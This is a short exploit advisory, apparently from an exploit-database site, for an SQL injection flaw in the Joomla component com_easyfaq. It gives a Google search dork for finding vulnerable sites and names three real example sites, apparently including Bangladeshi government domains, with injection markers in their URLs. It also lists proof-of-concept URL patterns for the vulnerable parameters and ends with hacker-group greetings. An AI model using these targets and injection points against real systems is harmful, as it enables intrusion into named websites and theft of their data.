joomla component (com_easyfaq) SQL injection Vulnerability



EKU-ID: 1793 CVE: OSVDB-ID:
Author: Elite Trojan Published: 2012-03-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##################################################
# Exploit Title: joomla component (com_easyfaq) SQL injection Vulnerability
# Date: 28/03/2012
# Author: Elite Trojan
# Category:: webapps
# Google dork: inurl:"option=com_easyfaq"
# Example Sites : http://www.cartagene.qc.ca/index.php?option=com_easyfaq&task=view&contact_id=%27
                             http://www.moedu.gov.bd/index.php?option=com_easyfaq&Itemid=1&task=view&gid=%27
                             http://www.pmo.gov.bd/index.php?option=com_easyfaq&task=view&contact_id=%27
# Tested on: linux + windows
##################################################

[~]Exploit/p0c :

http://site.com/index.php?option=com_easyfaq&task=view&contact_id=[sql injection]
or
http://site.com/index.php?option=com_easyfaq&Itemid=1&task=view&gid=[sql injection]
or
http://site.com/index.php?option=com_easyfaq&catid=1&task=view&id=-2527+[sql injection]


+--------------------------------------------------+
[»]                    #-DzMafia-#
[»] We are : password, eliteTrojan, gel-dz, BackUp
+--------------------------------------------------+
F0llow Us at : www.fb.me/Ma.dz.fia
+---------------------------------------------------+
[»] Greetz to : 1337day.com
[ TrOon,Aghilas,r00t_dz,Hacker-fire,Vaga-hacker,Imed Lakamora ]
[ & -> !Muslims!,Mosta,team152,Inj3ct0r ]
[ And all my Freinds + Algerian Hackers ]
-----------------------------------------------------+
DzMafia © 2012 All rights reserved.